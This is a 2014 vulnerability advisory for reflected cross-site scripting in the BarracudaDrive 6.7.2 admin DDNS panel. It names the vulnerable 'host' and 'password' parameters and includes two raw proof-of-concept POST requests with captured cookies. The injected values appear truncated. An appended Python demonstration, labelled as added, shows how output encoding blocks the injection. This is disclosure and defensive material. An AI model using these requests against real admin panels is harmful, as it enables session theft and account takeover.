###############################################################################
#Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Reflected Cross-Site Scripting
#Author : Govind Singh aka NullCool
#Vendor : http://barracudadrive.com
#Software : BarracudaDrive 6.7.2
#Date : 15/06/2014
#Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina
################################################################################

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Overview of vulnerability o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BarracudaDrive Multiple Reflected Cross-Site Scripting in ddns panel

BarracudaDrive contains reflected cross-site scripting vulnerabilities: user input is not properly checked before submission.

1) The "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary script code.

2) The "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary script code.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Proof of Concept: o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1).

Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=81
POSTDATA=provider=DNSdynamic&host=">&username=%3E&password=%3E

PoC image : http://prntscr.com/3sym87

2).

Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=78
POSTDATA=provider=DNSdynamic&host=&username=%3E&password=">

PoC image : http://prntscr.com/3symgz
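
Added example, not part of the original advisory and not BarracudaDrive's code: a Python demonstration of why a reflected value beginning with "> leaves its form field, and how HTML-attribute encoding on output keeps it inside. Only the parameter names come from the POSTDATA above; the form markup, the helper names and the sample body are constructed assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Parameter names taken from the advisory's POSTDATA.
FIELDS = ("provider", "host", "username", "password")
# Constructed sample body: host starts with "> followed by a harmless <i> marker.
SAMPLE_BODY = "provider=DNSdynamic&host=%22%3E%3Ci%3Ex%3C%2Fi%3E&username=%3E&password=%3E"
# Hypothetical form markup; the product's real template is not shown in the advisory.
FIELD_HTML = '<input name="%s" value="%s">'

def parse_post(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    parsed = parse_qs(body, keep_blank_values=True)
    return {name: parsed.get(name, [""])[0] for name in FIELDS}

def render_unsafe(params):
    """Reflect the values verbatim, the behaviour the advisory reports."""
    return "".join(FIELD_HTML % (n, params[n]) for n in FIELDS)

def render_safe(params):
    """Encode & < > " ' so a value cannot terminate its attribute."""
    return "".join(FIELD_HTML % (n, escape(params[n], quote=True)) for n in FIELDS)

class TagAudit(HTMLParser):
    """Record each start tag and the value attribute of every input."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            attrs = dict(attrs)
            self.values[attrs.get("name")] = attrs.get("value")

def audit(markup):
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.values

def reflected_intact(markup, params):
    """True when only the expected inputs exist and every value round-trips."""
    tags, values = audit(markup)
    return tags == ["input"] * len(FIELDS) and values == params

if __name__ == "__main__":
    p = parse_post(SAMPLE_BODY)
    print("unsafe intact:", reflected_intact(render_unsafe(p), p))
    print("safe intact:  ", reflected_intact(render_safe(p), p))
```

The same round-trip check can serve as a regression test for any template that echoes submitted form values back into attributes.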